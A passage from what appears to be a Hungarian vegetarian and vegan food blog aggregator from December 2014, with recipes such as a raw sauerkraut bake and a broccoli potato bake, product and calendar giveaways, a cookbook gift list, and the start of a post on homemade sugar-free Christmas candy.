= d.createElement(s); js.id = id; js.src = //connect.facebook.net/hu_HU/all.js#xfbml=1; fjs.parentNode.insertBefore(js, fjs); }(document, script, facebook-jssdk));
Energiadús, nyers rakott káposzta (vegán, mindenmentes)
Így a téli ünnepi nagy zabálások után szerintem minden gyomorra ráfér egy kis természetes, nyers frissesség. Nem tudom ti, hogy vagytok vele, de mi az ünnepek után sokkal több salátát, nyers zöldséget fogyasztunk, és rá sem bírunk nézni a kelttésztákra, süteményekre, nehéz ételekre. ;-) És persze, ha felszökött néhány plusz kiló a karácsonyi vacsora turnék alatt, amitől szeretnénk megválni, akkor is érdemes a salátákhoz nyúlni! ;-) Energia és tápanyagdús, nyers rakott káposztaSokan azonban a saláta szó hallatán, üres, kalórát nélkülöző zöld levelekre gondolnak, amik inkább csak tányér díszek, mintsem igazi fogások ebédidőben vagy este a vacsoránál. Rengeteg nyers zöldséges étel van, melyeknek valódi kalória tartalmuk, igazi tápértékük, és számos előnyős tulajdonságuk létezik, és amelyekkel valódi fizikai tevékenységet is lehet végezni. Ilyen az egyik C-vitaminban nagyon gazdag, a téli időszakban nagyon hasznos, és tápláló nyers rakott káposzta. Ez egy savanyúkáposztából készült nyers étel, telis tele vitaminokkal, ásványi anyagokkal, és mindenféle hasznos tápanyaggal, aminek az ünnepek alatt leterhelt gyomrunk, és emésztő rendszerünk is nagyon tud örülni. :-) Egy kicsit szkeptikus voltam az elején ezekkel a nyers ételekkel kapcsolatban. Nem hittem, hogy 1 óránál tovább érezhetem a jóllakottság érzését, de tévedtem! :-) Tényleg igazi főfogásokat készíthetünk egy-egy nyers zöldségekből, magokból álló, természetes ételből. Már korábban említettem Lénárt Gitta nevét, aki ismert szóvívője ennek a területnek ma Magyarországon. Ez a recept is tőle származik. Kipróbáltuk többször is, kicsit módosítottam rajta, és csak ajánlani tudjuk nektek is! :-) Energiadús, nyers rakott káposzta Még egy nagy előnye van a nyers ételeknek! ;-) Ha épp áram nélkül maradtok a lakásban, vagy a gázpalack ürül ki éppen, ez az étel akkor is elkészíthető, mert minden hozzávaló, a maga természetes állapotában, természetes ízekkel és színekkel, könnyen emészthető módon vesz részt ezekben az ételekben, jelen esetben ebben a remek, nyers rakott káposztában! ;-) Egyszerű, nagyszerű, finom, színes, energiadús, könnyen emészthető, tápanyagban gazdag, és nem kell hozzá főző tudomány, hogy elkészítsük! ;-) Hozzávalók HOZZÁVALÓK: - 400 g savanyú káposzta - 150 g paradicsom, retek és piros pritamin paprika mix (összesen 150 g) - fél lilahagyma - 150 g dió, melyet előre vízben beáztatunk a könnyebb emésztés érdekében - 2 gerezd fokhagyma - Himalája só - 200 g sárgarépa - 100 g napraforgó mag (ezt be kell áztatni legalább 1 órára, de jobb kettőre) - 1 teáskanál friss citromlé - három marék friss spenót levél - 1 érett avokádó (apróra felkockázva) - friss petrezselyem Energiadús, nyers rakott káposzta (kuszkusz ágyon) ELKÉSZÍTÉS: Ha nem akarjuk, hogy a savanyúkáposztának túl intenzív íze legyen, mossuk át egy kicsit a csap alatt, folyó vízben. A paprikát, a paradicsommal, a retekkel, és a fél lilahagymával, kevés vízzel a turmix gépben krémmé turmixoljuk, majd ezt a turmixot jól összekeverjük a káposztával. A beáztatott diót, a fokhagymával és a sóval aprító gépben, ledaráljuk, hogy nagyobb morzsalékokat kapjunk. A sárgarépát meghámozzuk, majd a nagy lukú reszelőn lereszeljük, A beáztatott napraforgó magot, kevés vízzel, sóval, citromlével összeturmixoljuk a gépben, hogy egy nyers krémszerű állagot kapjunk, melyet a tejföl helyett kenhetünk az étel tetejére. Ettől krémesebb lesz a rakott káposztánk. ;-) Most pedig összeállítjuk az étel remeket: Egy jénai tálban alulra leteszünk egy réteg lilahagymás-retkes-paradicsomos-paprikás szószos káposztát, erre rászórjuk a fokhagymás diós morzsalékot, majd a reszelt sárgarépát. Erre a rétegre ráh elyezzük a spenót leveleket, a felkockázott avokádót, majd mehet a maradék káposzta a tetejére. Kicsit megnyomkodjuk az egészet, majd legvégül leöntjük a napraforgó magos "tejföl" - lel. Kevés friss petrezselyemmel megszórva tálalhatunk is. :-) nyers rakott káposzta Energiában és tápanyagban gazdag jó étvágyat kívánok hozzá! Megjegyzés1: ne ijedjetek meg, ha marad belőle, mert hűtőben eltéve, másnap, mikor az ízek már jól összeértek, még finomabb! ;-) Megjegyzés2: Balázs nem bízott a tápértékében, ezért az ő adagját kuszkusz ágyra fektettem. De akármilyen más gabonával is bátran tálalható! Vagy anélkül... ;-)
SkipHop kedvenc termékek gyerekeknek + Nyereményjáték
2014. december 22. Zizi kalandjai
A Skip*Hop Magyarország felkérésére összeállítottam egy listát, hogy nekem melyek a kedvenc termékeim. Van köztük olyan, amit már egy ideje mi is használunk és nagyon elégedettek vagyunk vele. Tényleg szeretettel ajánlom a kiváló minőségű termékeiket. A bejegyzés végén pedig játék, egy valaki nyerhet egy SkipHop Zoo tányérszettet. egy – Fából készült szeletelhető gyümölcsök Mi nagyon szeretjük a fából készült játékokat és ezzel a gyümölcs szettel + a késsel jól lehet gyakorolni azt, amit mindig anya csinál a konyhában. kettő – SkipHop Zoo esőkabát / majom Saját tapasztalat, hogy a gyerekek szeretik az esőt (felnőttek már kevésbé ) és pocsolyába gázolni. Cuki divatosak lesz a gyerekünk egy ilyen vízálló kabátban, még a szívünket is meglágyítja a csuromvizes gyerek látványa. három – SkipHop Zoo nyakpárna / bagoly Plüss, puha nyakpárna rövidebb vagy hosszabb utazásokhoz. négy – SkipHop Zoo uzsonnás táska / pingvin SkipHop ételtároló uzsonnástáska, belseje hőszigetelt, frissen tartja a benne tárolt ételt. Tágas egyterű rekeszében praktikusan helyezhető el a szendvics, gyümölcs, ital stb. Nekünk zsiráfos van és minden városi “kirándulásunkra” velünk tart. öt – SkipHop Zoo uzsonnás doboz készlet / méhecske BPA és PVC mentes uzsonnás doboz, amelyben egy kisebb doboz is van. Mini szendvics, apró gyümölcsök, kölesgolyók tárolására kiváló ez a könnyen nyitható doboz, amelynek a gumis széle meggátolja bármilyen folyékony anyag kiszivárgását. hat – SkipHop Zoo ételtároló / kutya Rozsdamentes acél hordozható ételtároló termosz hideg- és melegentartó funkcióval. Tartalmazza a multifunkciós evőeszközt (kanál és villa egyben), űrtartalma 325 ml. BPA-, PVC-, ftalát mentes. hét – SkipHop Zoo törülköző / béka Minden babó nagyon cuki egy óriási, kapucnis törülközőben, pláne, ha az puha és vidám állatfigurás. 100% pamut frottír az anyaga, rendkívül jó nedvszívó. nyolc - SkipHop Moby csúszásgátló kádba / bálna Miután Ádi stabilan állt, kellett valami a kádba, hogy ha feláll biztonságban legyen, mert nagyon könnyű elcsúszni. Egy kedves barátunk meglepett egy ilyen bálnás csúszásgátlóval. Ádi először félt tőle, nem akart ráállni, de most már nagyon jó barátok és figyeli, hogy ha jön-megy a kádban, akkor mindig csak óvatosan Mobyn állva tegye. kilenc – SkipHop Zoo könyvtámasz / kutya Cuki kutyus könyvtámaszok a gyerekszoba könyvespolcára. Ezekkel a súlyozott, műbőr anyagú állatfigurákkál a polc is rendezettebbé válik. tíz – Yeominis kerti szerszám szett Nem lehet elég korán kezdeni a kertészkedés tudományát. Ehhez egy ilyen szett tökéletes segítség lesz. ***** NYEREMÉNYJÁTÉK!!! Nyeremény : a közelgő karácsony alkalmából a Skip*Hop Magyarország felajánlott egy SkipHop Zoo tányér szettet egy leendő szerencsés nyertesnek (aki kiválaszthatja az állatfigurát, amelyiket szeretné megkapni)! Menjetek fel a Monkie oldalára és írjátok meg ide a bejegyzés alá kommentben, hogy nektek melyik termék nyerte el leginkább a tetszéseteket az összes közül! Kérem, hogy az alábbi formula minden pontját értelemszerűen hajtsátok végre (írjatok kommentet és lájkoljátok a Monkie és a SkipHop Magyarország Facebook oldalát, de ezt itt a formulában is jelöljétek be, különben nem kerültök bele a kalapba)! a Rafflecopter giveaway Szabályok : 2014. december 21-23-ig tart a játék. Eredményhirdetés 2014. december 24-én. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyertes a nyereményt személyesen veheti át a Skip*Hop Magyarországtól Budapesten vagy magyarországi címre postázzák.
Vadnövény naptár nyereményjáték a Collective Plant-tal
2014. december 16. Zizi kalandjai
Fotó: Glódi Balázs – MENÜ A Collective Plant ötlete kedves barátnőm, Illés Zsófi elméjéből pattant ki. Zsófi azt találta ki, hogy a városban és környékén elérhető rengeteg természeti forrással ismerkedjünk meg és tanuljuk meg hasznosítani az így vadon begyűjtött növényeket. Le kell szögeznem, hogy imádom a Collective Plant-et… azt a szívből áradó munkát, amit a hagyományőrzésért, a környezetért, a közösségépítésért tesznek szinte önkéntes alapon. Nagy rajongójuk lettem, biztosan ott leszünk Ádival jövő tavasszal az egyik vadnövény gyűjtögető túrájukon! A városi gyűjtögetés nem egy elvonatkoztatott tétel, hiszen rengeteg zöldterületen szedhetünk ehető vadnövényeket, mindössze az a praktikus tudás hiányzik hozzá, amivel életben tarthatnánk magunkat. Ezt a deficitet a Collective Plant városi, vagy városközeli túrákkal hozza be, olyan oktatási eszközökkel, ami a közösségi megosztáson alapszik. A jelenlegi tagok közös érdeklődésüknek, a fotózásnak, az újságírásnak, és az ételeknek akartak egy komolyabb csomópontot, ahol rengeteg művészeti munka, az ökoaktivizmust mélységeiben bemutató elméleti írás, és gyűjtögető knowhow áramlik keresztül. A városi élelmiszerforrásokra rámutató közös kirándulások jelentik a csoport működésének alapját, az online jelenlétben pedig egy jóval komplexebb tartalom bomlik ki. Fotó: Glódi Balázs – MENÜ A Collective Plant a gasztronómián keresztül is igyekszik befogadó lenni, ezért az ehető vadnövények elkészítési lehetőségeire sokszor vegán, glutén- illetve laktózmentes javaslatokat is tesz - a weblapon elérhető receptek egy része az ételintoleranciával élőknek is választékot kínál. A túrákon az éppen elérhető, szezonálisan termő, ehető vagy gyógyhatású növényeket kutatják fel, a résztvevők nemcsak a szedésre, hanem a feldolgozásra is kapnak tippeket, bőven a tartósítás horizontján túl. Fotó: Glódi Balázs – MENÜ A túrákon kívül szerveznek étel- és magcseréket, vadnövényes főzéseket, workshopokat (teakeverés, textilfestés). 2014. december 20-án szombaton a Lumen Zöldségesben vadnövényes karácsonyi vásárt tartanak. Ennek a bevétele a CP munkáját és minden egyes tárgy esetében az alkotó képzőművész munkáját támogatja. A vásáron kaphatóak lesznek: - vadnövénynaptár és fanzinok - gyűjtött vadnövényes/gyógynövényes karácsonyi fűszersók/fürdősók - gyűjtött gyógynövényes karácsonyi fenyőrügyes tea - vadgyümölcs-fűszer-gyógynövény bitterek - tea/fűszer matricák - festett táskák - karácsonyi képeslapok És a legfontosabb… a nemrégiben limitált példányszámban (1000 db) megjelent MENÜ szakácskönyvben is megjelentek, amely egy receptgyűjtemény, melyhez 22 budapesti alkotó adja a hozzávalókat. A szakácskönyv egyben történetek gyűjteménye is, azoké az embereké, akik a mai budapesti gasztrokultúra alakításán dolgoznak. Gratulálok a Collective Plant csapatának! A Collective Plant elérhető az alábbi linkeken: - Weboldal - Facebook - Vimeo ***** NYEREMÉNYJÁTÉK!!! Nyeremény : egy darab Collective Plant vadnövény naptár felhasználási ötletekkel, receptekkel. Írjátok meg ide a bejegyzés alá kommentben, hogy ti voltatok-e már vadon termő növényeket gyűjtögetni és ha igen, akkor mit készítettek belőle. Ha nem voltatok még, akkor is kommentáljatok, hogy például szeretnétek-e menni! :) Kérem, hogy az alábbi formula minden pontját töltsétek ki; ha kommentáltatok a blogon, akkor utána a formulában klikkeljetek a szürke I commented! kockára; ha még nem vagy ha már lájkoltátok a Collective Plant Facebook oldalát, akkor írjátok be a kis kockába, hogy milyen névvel lájkoltatok (vagyis amilyen névvel vagytok regisztrálva a Facebookon), aztán klikk a szürke I visited! kockára. Ezenkívül osszátok meg a játékot itt a bejegyzés alatt található megosztási lehetőségek egyikével (Facebook, Twitter). a Rafflecopter giveaway Szabályok : 2014. december 16-tól december 19-ig lehet játszani. Eredményhirdetés december 20-án. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyertesnek a nyereményt a Collective Plant postázza magyarországi címre.
Ezüst kanálka medál nyereményjáték
2014. december 8. Zizi kalandjai
Elképzelhető, hogy többen találkoztatok már Fehér Péter különleges ékszereivel, ha mégsem, akkor itt bepillanthattok elkészült munkáiba. Péter és a családja nagyon kedves barátaink, így egy ideje már nyomon követjük pályafutását. Óvóbácsiként diplomázott, mestersége ékszerész, hivatása pedig égszerész. Péter hisz abban, hogy az általa készített ékszer nemcsak ék, amely ékesíti az embert, hanem az ég szere is. Amikor gondolkoztunk Péterrel, hogy hogyan köthetjük össze a gasztronómiát és az ékszer készítést, akkor jött az ötlet, hogy egy kanál formájú medált fog készíteni, amelyet felajánl a játék nyereményeként. A képen látható kanálka medál 925-ös sterling ezüstből készült, hossza 5,5 cm. Még többet Péterről itt olvashattok és elérhető az alábbi linkeken: - Weboldal - Facebook - Meska bolt ***** NYEREMÉNYJÁTÉK! Nyeremény : egy darab 925-ös sterling ezüstből készült kanálka medál. Nézzetek szét Péter Meska boltjában és írjátok meg ide a bejegyzés alá kommentben, hogy melyik általa készített ékszer tetszik a legjobban, vagy ha nincs ilyen, ti milyen ékszert készíttetnétek Péterrel. Kérem, hogy az alábbi formula minden pontját töltsétek ki (játszhattok extra pontért is)! Vagyis a számok (+5, +3) melletti lefelé mutató nyilakkal nyissátok meg az ablakokat és hajtsátok végre az apró feladatokat. Ha kommentáltatok a blogon, akkor utána a formulában klikkeljetek a szürke I commented! kockára; ha még nem vagy ha már lájkoltátok Péter Facebook oldalát, akkor írjátok be a kis kockába, hogy milyen névvel lájkoltatok (vagyis amilyen névvel vagytok regisztrálva a Facebookon), aztán klikk a szürke I visited!-re. a Rafflecopter giveaway Szabályok : 2014. december 9-től december 13-ig lehet játszani. Eredményhirdetés 2014. december 14-én. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyertesnek a nyereményt Péter postázza magyarországi címre.
Brokkolis sajtos krumpli : gyors és egyszerű egytálétel
2014. december 8. Zöld Avocado
Brokkolis sajtos krumpli A burgonya egy alapvető élelmiszerünk, amiből rengeteget fogyasztanak a magyarok is. Korábban akár heti kétszer vagy még többször is az asztalra került ilyen olyan formában. Sülve, főve, egytálételként, köretként, tojással, salátaként, püré formájában stb. Manapság már egyre ritkábban fogyasztjuk, mert vannak, nála sokkal értékesebb zöldségek is melyek, gyorsan elkészíthetőek és laktatóak. Ráadásul elég sok ember nem képes, vagy csak részben képes megemészteni a burgonyát, és gyomor fájdalmak jelentkeznek az elfogyasztásuk után. :-( Természetesen azért vannak jó tulajdonságai is a burgonyaféléknek, amiért érdemes néha beiktatni az étrendünkbe. ;-) Lássuk, mik ezek? ,,Mikor főzik vagy sütik, a burgonya gyakorlatilag zsírmentes élelmiszer. A burgonyában a fő energiaszolgáltató tápanyag a szénhidrát, keményítő formájában. A szénhidrátok elsődleges energiaforrások a test számára. A burgonya önmagában kevés fehérjét tartalmaz, de tejtermékkel vagy tojással kombinálva jó minőségű fehérjét tartalmazó étel készíthető belőle. A burgonyafélék rostforrások, amik hozzájárulnak a telítettségérzethez, és támogatják az egészséges emésztést. A burgonyafélék jelentős C és B vitamin források, gazdagok káliumban, emellett még kis mennyiségű magnéziumot és vasat is tartalmaznak. A különböző elkészítési módok következtében a burgonyaételek tápanyagtartalma rendkívül változatos. Az elkészítés során fellépő tápanyagvesztés függ a hőfoktól és az elkészítés időtartamától. A vízoldékony vitaminok és ásványi anyagok, mint a B vitaminok, a C-vitamin és a kálium kioldódnak a vízbe a főzés során. További ,,jó hír azoknak, akik igyekeznek elkerülni a testtömeg növekedését, hogy a burgonyaféléknek magas a telítő értéke. A burgonyafélék gluténmentesek, ebből következően szabadon fogyaszthatóak azok számára, akiknek kerülniük kell a glutént. Forrás: Európai Élelmiszer Információs Bizottság Ezúttal készítsünk egy egyszerű és gyors egytálételt burgonyából, brokkoliból és sajtból! Egy étel azoknak akik imádják a sajtokat! brokkolis sajtos krumpli HOZZÁVALÓK: - 1,5 kg burgonya - 2 tojás - 400 g sajt (valami kemény és ízes sajt pl.: jófajta trapista, ementáli, pannónia, füstölt stb. Lehet keverni is, és többféle sajtot felhasználni) - 2 dl mandula tej / rizs tej / mogyórótej - 3 ek rizsliszt / tönkölyliszt / kukoricaliszt - 1 ek répce olaj / olíva olaj / kókusz zsír - 500 ml natúr organikus joghurt / görög joghurt / bio tejföl - 1 közepes fej brokkoli - Himalája só, fehér bors, olasz fűszerkeverék - (friss petrezselyem, és sörélesztő pehely) ELKÉSZÍTÉS: A burgonyát megfőzzük, főzés után meghámozzuk, és felkarikázzuk. (Én már előző nap este meg szoktam főzni, hogy ne menjen vele az idő másnap. ;-) ) A szószhoz egy tálban összekeverem a joghurtot, a tojást, a lisztet, a zsiradékot, a sót, borsot, és az olasz fűszerkeveréket. A sóval ne spóroljunk, mert a krumpli felszívja. De persze sózni utólag is lehet, ha nem vagyunk elég bátrak. A brokkoliról levágom a ,,bokor részét mert csak arra lesz szükségünk, és megmosom. A szárat sem kell kidobni, mert a következő zöld turmixba pont elfér. (A Zöld turmixról majd egy későbbi bejegyzésben még írok). A turmixgépbe szórom a megmosott nyers brokkoli bokrot, felöntöm a tejjel, és összeturmixolom. A cél, hogy a nyers brokkoli morzsákra essen szét. Ezt a brokkolis tejet is a tálba öntöm a joghurtos szószhoz, és összekeverem az egészet. A sajtot, vagy sajtokat a nagy lyukú reszelőn lereszelem. Igen, tudom, most mindenki húzza a száját, mert ezt a konyhai műveletet senki nem szereti. Én sem. ;-) Ezért ha van egy olyan csodamasinátok, mint nekem, - mint, amilyet már javasoltam egy korábbi bejegyzésben, hogy érdemes beszerezni - , akkor ezt egyszerűbben is meg lehet oldani. Elővesszük a multifunkciós készülékünk két késes darabolóját és a kis hengert. Ezzel lehet magokat őrölni. Én most sajtot fogok daraboltatni vele. Nem annyira szereti, de ha óvatosan csináljuk, kibírja. ;-) Ne tegyünk bele túl zsíros sajtot, mert akkor csak kiforognak a kések, és leégetjük a motort. Tehát a kemény sajtot kockákra szedve (kb.2*2cm), a kis hengerbe tesszük, úgy, hogy az félig tele legyen. 1-es fokozaton bekapcsoljuk a gépet, és pár másodperc alatt, kész is a sajt morzsa. Beleöntjük a joghurtos brokkolis szószba, és újra töltjük a kis hengert a sajttal. Mindezt addig ismételjük, míg a sajt teljes egészében elfogyott. (Hagyjunk annyi sajtot, hogy az étel tetejét meg tudjuk szórni a végén, ami aztán majd jól megpirul az étel tetején.) Előveszek egy nagy, de lapos jénai tálat, amit kikenek vékonyan kókuszsírral (vagy valamilyen más zsiradékkal), beleteszek egy réteg főtt, karikázott krumplit (az összes felét), majd leborítom a brokkolis szósz egyik felével. Kicsit fakanállal összekverem, hogy midenhová jusson a szószból. Erre rászórom a krumpli másik felét, és leborítom a maradék szósszal. A tetejét megszórom a félrerakott reszelt sajttal, és 220°C -ra előmelegített sütőbe teszem ezt az egyszerű, de kiadós egytálételt. Kb.20-25 perc alatt készre sütjük. Az utolsó pár percben érdemes grillezősre kapcsolni a sütőnket, hogy a sajt a tetején jól rápiruljon. ;-) Tálaláskor szórjunk rá friss petrezselymet, és sörélesztő pelyhet a gazdagabb tápanyagtartalom és ízélmény elérése kedvéért! Megjegyzés: Ez nem az az étel, amit azért készítünk el, mert olyan ínycsiklandóan néz ki, hanem azért mert nagyon finomak az olvadt sajtos, fehér szószban tocsogó burgonya karikák. :-) Egyszer, kb.15 évvel ezelőtt kipróbáltam egy alapreceptjét ennek az ételnek, és azóta nem tudunk megfeledkezni róla. Rendszeres időközönként elhangzik ez a mondat itthon "hú, de ennék egy jó kis sajtos krumplit!"... ez így megy már 15 éve. ;-) Próbáljátok ki (akár brokkoli nélkül is), és megértitek miről beszélek. ;-) Jó étvágyat hozzá! :-)
Ananászpakora almacsatnival
2014. december 3. Vegán muflon
Azt hiszem, a következő specialitás neve néminemű magyarázatra, illetve definiálásra szorul. Az ananász egy trópusi éghajlati övből származó gyümölcsféle, az alma pedig nem feltétlenül. Most, hogy mindenki felszabadult attól a nyomásól, melyet a feje fölött tornyosuló kérdőjelek okoztak, induljunk meg a konyha felé. Nem mellesleg - ahogy a cím is sugallja - pakorát nem csupán zöldségekből lehet létrehozni, eltérés csak a fűszerezésben van. Alkotóelemek: Pakora: 2 db érett ananász (így néz ki) 25 dkg csicseriborsóliszt (de amúgy mezei fehér, vagy teljes kiőrlésű is megteszi) 3 dl szójatej vagy jobb híján szódavíz 2 kiskanál porcukor 1 kiskanál kurkuma 1 kiskanál fahéj 1 kiskanál őrölt szegfűszeg Csatni: 4-5 db alma (sajnos ehhez a Google nem talált képet:(((( ) 1 kiskanál római kömény 1 kiskanál ánizs 1 kiskanál fahéj 2-3 db szárított erőspaprika feldarabolva 2 evőkanál cukor A porcukrot és a fűszereket elkeverjük a lisztben, majd hozzáadjuk a szójatejet. (Ne legyen túl sűrű, ha az, akkor további tejjel zabolázzuk.) Egy jó órát állni hagyjuk, mi viszont addig elkészítjük a csatnit. Az almákat héj és magház-deficittel sújtjuk, majd nyolc részre felvágjuk. A fűszereket és a chilit kevés olajon megpirítjuk, majd hozzájuk borítjuk az almát és a fahéjat. Fedő alatt pároljuk (kis vizet is adhatunk hozzá), amíg szét nem fő, ekkor levesszük a tűzről és elkeverjük benne a cukrot. Közben az ananászt belemártjuk az állni hagyott elegybe, és közepesen forró olajban kisütjük. (Figyeljünk rá, hogy megpuhuljon, mer úgy a finom.) Ezittaz:
Vegetáriánus, vegán szakácskönyv ajánló karácsonyra
2014. december 3. Zizi kalandjai
Ha fejtörést okoz, hogy mit vegyél egy főzni, sütni szerető, netán gasztroblogger vegetáriánus, vegán rokonodnak, barátodnak, akkor szerintem egy szakácskönyv mindig jó ötlet. Én legalábbis nagyon tudok örülni egy könyvnek, amivel bővítem a gyűjteményemet és újabb inspiráció özön szál meg a könyv lapozgatása közben. Szóval összegyűjtöttem az utóbbi időszak szerintem legjobb vegán és vegetáriánus szakácskönyveit. Biztosra tudom, hogy a saját Jézuskám az idén meglep három új könyvvel – mindegyik szerepel ezen a listán -, de elképzelhető, hogy lesz meglepetés is a fa alatt. Az általam választott könyvek többsége angol nyelvű, de a listára tettem néhány magyar nyelvűt is. Külön linkeket nem szúrok be a könyvekhez, mert több helyen kaphatók, megrendelhetők (idegen nyelvű könyvesboltok, Alexandra, Bookline, Amazon – USA, Amazon – Anglia, Book Depository, Barnes & Noble), mindenki keressen rá és válassza ki a számára megfelelő forrást. És akkor íme a lista… egy - Anya Kassoff: The Vibrant Table Anya orosz származású és jelenleg Floridában él. Ő írja a híres Golubka blogot, ami nekem nagy kedvencem. Részt vettem Anya szakácskönyvének recept tesztelésében, így a köszönetnyilvánításban megjelenik a nevem! Az ételek szinte kivétel nélkül gluténmentesek és vegánok, néhány nyers és vegetáriánus étellel társítva. kettő – Amy Chaplin: At Home In The Whole Food Kitchen Amy vegetáriánus szülők gyermekeként látta meg a napvilágot és vegetáriánus chefként dolgozik már több, mint 20 éve. Ez az első szakácskönyve, amely idén októberben jelent meg. A könyvben 150 recept van, többsége vegán és ráadásul még gluténmentes is. Amy egyébként privát chefként is dolgozik olyan hírességeknek, mint Natalie Portman és Liv Tyler. Saját blogja: Amy Chaplin. három – Angela Liddon: The Oh She Glows Cookbook Angela Kanadában él és ő írja az Oh She Glows vegán blogot, ami szintén a kedvenceim között szerepel. Nagyon inspirálóak a receptjei mind a blogján, mind a szakácskönyvében. Ez az első szakácskönyve, amely idén márciusban jelent meg (kétféle borítóval kapható, figyeljetek rá!) és több, mint 100 vegán receptet tartalmaz, köztük 85 gluténmenteset is. négy – Bryant Terry: Afro-Vegan Az Afro-Vegan Bryant negyedik szakácskönyve és idén áprilisban jelent meg. Chef, oktató és aktivistája az egészséges, fenntartható konyhának. Nagyon várom ezt a könyvet, hogy elmerüljek az afro receptek világában. öt – Bede Anna: Vegasztrománia Azt hiszem nem kell bemutatnom vegetáriánus blogger társamat, Annát, akinek vegasztrománia nevű blogja nőtte ki magát szakácskönyvvé. Évek óta népszerű írásai, jellegzetes fotói magával ragadóak és egyből arra ösztönöznek, hogy betérjünk a konyhába főzni. Annával készítettem egy interjút, ahol a könyvének készítéséről faggattam. hat – David Frenkiel & Luise Vindahl: Green Kitchen Travels A svéd-dán szerzőpáros írja a világhírű Green Kitchen Stories blogot Stockholmból. Évek óta hű olvasójuk vagyok, az összes bejegyzésüket elolvastam és jó pár receptjüket megcsináltam (blogról és könyveikből egyaránt), néhányat a saját blogomon is megosztottam. Első könyvük a The Green Kitchen (kétféle borítóval kapható, figyeljetek rá!) 2013 áprilisában jelent meg, amelyet gyorsan követett a második a Green Kitchen Travels idén szeptemberben. Mindkét könyvet nagyon ajánlom, én személy szerint a legkedvesebb könyveim között tartom számon őket. hét – Yotam Ottolenghi: Plenty More Azt hiszem Ottolenghit nem igazán kell bemutatni. Számos étterem (Londonban) és szakácskönyv tulajdonosa. Származását tekintve angol, izraeli és olasz vér csörgedezik az ereiben és ez a hatás észrevehető a konyháján is. Egyébként húsevő, de 1996-ban elkezdett írni egy rovatot a Guardian újságba az új vegetáriánus (The New Vegetarian) címmel és hetente megosztott vegetáriánus recepteket. Ebből nőtte ki magát első vegetáriánus szakácskönyve a Plenty 2010 tavaszán, amely nagy sikert aratott. Idén megérkezett a folytatás, a Plenty More (kétféle borítóval kapható, figyeljetek rá!). Júniusban a Food Blogger Connect konferencián Londonban volt szerencsém találkozni Yotam-mal és üzleti partnerével Sami Tamimi-vel. Nagyszerű emberek! nyolc – Kimberley Hasselbrink: Vibrant Food Kimberley írja a The Year In Food nevű híres blogot, amelyet nem régóta követek. Nagyon megszerettem a receptjeit. Könyve a szezonalitást követi (ha jól tudom minimális húsos étel azért van a könyvben, de ezek elenyészőek), gyönyörű fotókkal illusztrálja az ételeket. Egyszerűen inspiráló. kilenc – Heidi Swanson: Super Natural Every Day Heidi-nek 2011 tavaszán jelent meg a második vegetáriánus szakácskönyve, a Super Natural Every Day. Ő írja 2003 óta a világhírű 101 Cookbooks nevű blogot, hihetetlen sok recepttel. Talán ez volt az első vegetáriánus külföldi blog, amelyikre rákattantam. Már néhány éve megvan a második szakácskönyve, azóta is rendszeresen forgatom és sok ételt megfőztem, megsütöttem már belőle, akárcsak a blogjáról. tíz – Hugh Fearnley-Whittingstall: Zöldséget Minden Napra! Hugh a létrehozója a híres River Cottage TV sorozatnak, amely mára megabiznisszé (étterem, szakácskönyv, catering, stb.) nőtte ki magát. Hugh nem vegetáriánus, azonban vállalta, hogy egy nyári szezont végigcsinál hús nélkül. Ebből született egy TV sorozat és a szakácskönyv (angolul: Veg Every Day!). Az angol nyelvűt néhány éve rendeltem meg és az egyik legtöbbet forgatott vegetáriánus szakácskönyvem. Rengeteg egyszerű, inspiráló és különleges vegán és vegetáriánus recept található a könyvében. tizenegy – Rose Elliott: Nagy Vegetáriánus Szakácskönyv A könyvet így hirdeti a kiadó: “Grandiózus receptgyűjtemény, amelyre minden vegetáriánus és vegán ínyencnek szüksége van!”. Nos ezt megcáfolni és alátámasztani sem tudom, mert még nincsen meg a könyv, de könyvesboltban már forgattam egy párszor. Rose receptgyűjteményében az egyszerű tésztáktól kezdve az egészséges leveseken, salátákon és köreteken át egészen a csodakölteményekig és ínycsiklandó desszertekig minden megtalálható.
Tudod, mi van a bolti szaloncukorban? Így készíts cukormentes szaloncukrot!
2014. december 2. Éltető ételek
Évekkel ezelőtt, a korábbi munkahelyemen karácsonyra mindig kaptunk egy doboz szaloncukrot. Mire eljött a karácsony, már nem volt belőle, mindet felfaltam. Nos, azóta már sok víz lefolyt a Dunán, már évek óta nem veszek a boltban szaloncukrot. Viszont kíváncsiságból mindig megfordítom az üzletekben a szaloncukros dobozokat, zacskókat, és elolvasom az összetevőket. Elmondhatom, hogy évek óta nincs változás. Mindig ugyanazokat a "szemét" szaloncukrokat árulják. Igen, valóban így gondolom, ugyanis ezek táplálkozástudományi szempontból semmi értékeset nem tartalmaznak a szervezetünk számára. Sőt... Ha folytatod az olvasást, akkor elárulom, hogy miért is gondolom ezt így. Először is utánanéztem, hogy a Magyar Élelmiszerkönyv mit is ír a szaloncukorról. "A szaloncukor a karácsonyi ünnepkörhöz kötött, hagyományos termék, amely meghatározott szemnagyságú, két végén rojtozott selyempapírba és színes alufóliába vagy fóliába/fémgőzölt fóliába, pillangós zárással, szemenként csomagolt édesipari készítmény. A kiszáradás megakadályozására és az élvezeti érték növelésére a szemeket védőbevonattal (kandiszréteg vagy csokoládé-, illetve egyéb bevonat) látják el. " Hát eddig nem tudtuk meg, hogy mi is az előírás a szaloncukor összetevőit figyelembe véve. Nos, nem is tudjuk meg. Legalábbis ebben az irányelvben nincs meghatározva. Nézzük tovább: "Szaloncukorfajták Kandírozott szaloncukor: olyan szaloncukor, amelynek korpusza cukorkristály réteggel (kandisz) van bevonva.Mártott szaloncukor: olyan szaloncukor, amelynek korpusza ét-, tej- vagy fehércsokoládéval, illetve kakaós, kakaós tej vagy fehér bevonómasszával van bevonva. A bevonat aránya legalább 20%.Töltött (formázott) szaloncukor: olyan szaloncukor, amelynek külső része ét-, tej- fehércsokoládé-vagy bevonómassza. A burok aránya a termék összes tömegének legalább 25%-a.Fondanszaloncukor (konzum szaloncukor): olyan szaloncukor, amelynek korpusza fondanból készül, ízesítőanyagokkal ízesített, kandírozott vagy csokoládéval, illetve egyéb anyaggal van bevonva. Dúsított fondanszaloncukor: olyan szaloncukor, amelynek korpusza olajosmagvak, gyümölcsök, puffasztott gabonafélék stb. felhasználásával készül. A dúsítóanyagok mennyisége legalább 5% (m/m).Zselés szaloncukor: olyan szaloncukor, amelynek korpusza zselé, illetve 